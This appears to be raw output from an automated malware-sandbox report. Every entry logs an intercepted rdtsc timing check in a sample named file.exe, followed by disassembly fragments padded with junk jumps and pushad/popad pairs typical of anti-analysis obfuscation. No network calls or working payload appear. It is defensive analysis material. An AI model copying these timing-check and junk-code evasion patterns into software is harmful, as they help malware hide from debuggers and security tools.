Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9070F second address: 4D9072E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9072E second address: 4D90732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90732 second address: 4D90736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90736 second address: 4D9073C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9073C second address: 4D90771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+0000008Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEEE08A2317h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90771 second address: 4D90796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov ch, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+34h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEEE0EE3614h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90796 second address: 4D9079A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9079A second address: 4D907A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D907A0 second address: 4D907A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D907A6 second address: 4D907AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D907AA second address: 4D907E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007FEEE08A2314h 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEEE08A2317h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D907E5 second address: 4D90825 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, 9A48h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+1Ch] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FEEE0EE360Dh 0x00000016 adc esi, 65A2A4B6h 0x0000001c jmp 00007FEEE0EE3611h 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esi+3Ch], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90825 second address: 4D90829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90829 second address: 4D9082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9082F second address: 4D90835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90835 second address: 4D90893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e jmp 00007FEEE0EE3616h 0x00000013 mov dword ptr [esi+40h], eax 0x00000016 jmp 00007FEEE0EE3610h 0x0000001b lea eax, dword ptr [ebx+00000080h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FEEE0EE360Dh 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90893 second address: 4D90898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90898 second address: 4D908EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 5699h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 00000001h 0x0000000e jmp 00007FEEE0EE3612h 0x00000013 nop 0x00000014 pushad 0x00000015 call 00007FEEE0EE360Eh 0x0000001a push ecx 0x0000001b pop edi 0x0000001c pop eax 0x0000001d movsx ebx, cx 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FEEE0EE3619h 0x00000027 nop 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D908EF second address: 4D908F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9094D second address: 4D90953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90953 second address: 4D909D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ch 0x00000005 pushfd 0x00000006 jmp 00007FEEE08A2319h 0x0000000b sub cl, 00000076h 0x0000000e jmp 00007FEEE08A2311h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov edi, eax 0x00000019 jmp 00007FEEE08A230Eh 0x0000001e test edi, edi 0x00000020 pushad 0x00000021 popad 0x00000022 js 00007FEF5091102Bh 0x00000028 jmp 00007FEEE08A2316h 0x0000002d mov eax, dword ptr [ebp-0Ch] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FEEE08A2317h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D909D6 second address: 4D90A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEEE0EE360Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90A05 second address: 4D90A5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEE08A2317h 0x00000009 jmp 00007FEEE08A2313h 0x0000000e popfd 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 lea eax, dword ptr [ebx+78h] 0x00000017 jmp 00007FEEE08A2312h 0x0000001c push 00000001h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FEEE08A230Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90A5E second address: 4D90A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90A6D second address: 4D90A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A2314h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90A85 second address: 4D90AA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEEE0EE3613h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90AA3 second address: 4D90AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEEE08A2312h 0x00000009 or ecx, 7C232A98h 0x0000000f jmp 00007FEEE08A230Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90AD6 second address: 4D90ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90ADD second address: 4D90B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEEE08A230Eh 0x00000013 add ch, 00000028h 0x00000016 jmp 00007FEEE08A230Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FEEE08A2318h 0x00000022 sub ch, FFFFFF88h 0x00000025 jmp 00007FEEE08A230Bh 0x0000002a popfd 0x0000002b popad 0x0000002c nop 0x0000002d pushad 0x0000002e mov bx, ax 0x00000031 mov ecx, 74AB16F7h 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FEEE08A2318h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90BEE second address: 4D90C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp-04h] 0x0000000d jmp 00007FEEE0EE360Eh 0x00000012 mov dword ptr [esi+08h], eax 0x00000015 pushad 0x00000016 call 00007FEEE0EE360Dh 0x0000001b pushfd 0x0000001c jmp 00007FEEE0EE3610h 0x00000021 adc ecx, 0F84C258h 0x00000027 jmp 00007FEEE0EE360Bh 0x0000002c popfd 0x0000002d pop eax 0x0000002e popad 0x0000002f lea eax, dword ptr [ebx+70h] 0x00000032 jmp 00007FEEE0EE360Fh 0x00000037 push 00000001h 0x00000039 jmp 00007FEEE0EE3616h 0x0000003e nop 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 mov ah, 3Fh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90E34 second address: 4D90E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90E3A second address: 4D90E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lock cmpxchg dword ptr [edx], ecx 0x0000000e pushad 0x0000000f mov ax, 609Dh 0x00000013 mov edi, eax 0x00000015 popad 0x00000016 pop edi 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90E56 second address: 4D90EC5 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 47DBE72Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test eax, eax 0x0000000c jmp 00007FEEE08A2312h 0x00000011 jne 00007FEF50910B6Eh 0x00000017 jmp 00007FEEE08A2310h 0x0000001c mov edx, dword ptr [ebp+08h] 0x0000001f jmp 00007FEEE08A2310h 0x00000024 mov eax, dword ptr [esi] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FEEE08A230Eh 0x0000002d sbb cx, F9E8h 0x00000032 jmp 00007FEEE08A230Bh 0x00000037 popfd 0x00000038 push eax 0x00000039 push edx 0x0000003a movzx ecx, di 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90EC5 second address: 4D90EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [edx], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FEEE0EE360Bh 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90EE9 second address: 4D90EEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90EEE second address: 4D90F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FEEE0EE3610h 0x0000000a xor cx, CEA8h 0x0000000f jmp 00007FEEE0EE360Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+04h] 0x0000001b pushad 0x0000001c jmp 00007FEEE0EE3614h 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007FEEE0EE360Eh 0x0000002a adc ecx, 511F7C38h 0x00000030 jmp 00007FEEE0EE360Bh 0x00000035 popfd 0x00000036 popad 0x00000037 popad 0x00000038 mov dword ptr [edx+04h], eax 0x0000003b jmp 00007FEEE0EE3616h 0x00000040 mov eax, dword ptr [esi+08h] 0x00000043 jmp 00007FEEE0EE3610h 0x00000048 mov dword ptr [edx+08h], eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90F8A second address: 4D90F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90F90 second address: 4D90F95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90F95 second address: 4D91058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FEEE08A2310h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+0Ch] 0x00000010 jmp 00007FEEE08A2311h 0x00000015 mov dword ptr [edx+0Ch], eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FEEE08A230Ch 0x0000001f add cx, 6A88h 0x00000024 jmp 00007FEEE08A230Bh 0x00000029 popfd 0x0000002a mov eax, 1A3F82FFh 0x0000002f popad 0x00000030 mov eax, dword ptr [esi+10h] 0x00000033 jmp 00007FEEE08A2312h 0x00000038 mov dword ptr [edx+10h], eax 0x0000003b jmp 00007FEEE08A2310h 0x00000040 mov eax, dword ptr [esi+14h] 0x00000043 jmp 00007FEEE08A2310h 0x00000048 mov dword ptr [edx+14h], eax 0x0000004b pushad 0x0000004c mov esi, 75AB0B1Dh 0x00000051 mov edx, eax 0x00000053 popad 0x00000054 mov eax, dword ptr [esi+18h] 0x00000057 jmp 00007FEEE08A2314h 0x0000005c mov dword ptr [edx+18h], eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FEEE08A230Ah 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91058 second address: 4D9105E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9105E second address: 4D91079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91079 second address: 4D9107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9107D second address: 4D9109A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9109A second address: 4D910DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 121B69AEh 0x00000014 pushfd 0x00000015 jmp 00007FEEE0EE360Fh 0x0000001a jmp 00007FEEE0EE3613h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D910DF second address: 4D91138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FEEE08A2313h 0x00000015 sub cx, D51Eh 0x0000001a jmp 00007FEEE08A2319h 0x0000001f popfd 0x00000020 mov dl, al 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91138 second address: 4D91155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE0EE3619h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91155 second address: 4D9117D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b pushad 0x0000000c mov edx, 4BB0CFDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEEE08A2315h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9117D second address: 4D911E7 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007FEEE0EE360Ah 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 jmp 00007FEEE0EE3610h 0x00000018 mov eax, dword ptr [esi+28h] 0x0000001b jmp 00007FEEE0EE3610h 0x00000020 mov dword ptr [edx+28h], eax 0x00000023 jmp 00007FEEE0EE3610h 0x00000028 mov ecx, dword ptr [esi+2Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FEEE0EE3617h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D911E7 second address: 4D911EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D911EC second address: 4D91282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FEEE0EE3615h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+2Ch], ecx 0x00000010 jmp 00007FEEE0EE3617h 0x00000015 mov ax, word ptr [esi+30h] 0x00000019 pushad 0x0000001a mov dx, cx 0x0000001d pushfd 0x0000001e jmp 00007FEEE0EE3610h 0x00000023 jmp 00007FEEE0EE3615h 0x00000028 popfd 0x00000029 popad 0x0000002a mov word ptr [edx+30h], ax 0x0000002e pushad 0x0000002f pushad 0x00000030 mov si, 2DC9h 0x00000034 push ecx 0x00000035 pop edi 0x00000036 popad 0x00000037 movzx esi, di 0x0000003a popad 0x0000003b mov ax, word ptr [esi+32h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FEEE0EE3618h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91282 second address: 4D91287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D91287 second address: 4D912AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEEE0EE3614h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D912AA second address: 4D912D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A230Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEEE08A2310h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D912D0 second address: 4D912D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D912D6 second address: 4D912EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 9D23h 0x00000007 push eax 0x00000008 pop ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+34h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D912EB second address: 4D912EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D912EF second address: 4D912F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D912F5 second address: 4D9134A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3616h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f jmp 00007FEEE0EE3610h 0x00000014 jne 00007FEF50F519F8h 0x0000001a pushad 0x0000001b mov ecx, 31757C9Dh 0x00000020 mov cx, 4599h 0x00000024 popad 0x00000025 or dword ptr [edx+38h], FFFFFFFFh 0x00000029 pushad 0x0000002a mov ch, 0Eh 0x0000002c mov esi, ebx 0x0000002e popad 0x0000002f or dword ptr [edx+3Ch], FFFFFFFFh 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9134A second address: 4D91350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60D8E second address: 4D60D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D702E6 second address: 4D702EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D702EC second address: 4D70304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70304 second address: 4D70308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70308 second address: 4D7030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7030C second address: 4D70312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70312 second address: 4D70348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 72DDCE9Fh 0x00000008 pushfd 0x00000009 jmp 00007FEEE0EE3614h 0x0000000e sub cl, 00000008h 0x00000011 jmp 00007FEEE0EE360Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70348 second address: 4D7034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7034C second address: 4D70350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70350 second address: 4D70356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70356 second address: 4D7036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7036D second address: 4D70371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70371 second address: 4D70384 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, cx 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dx, ax 0x00000013 rdtsc
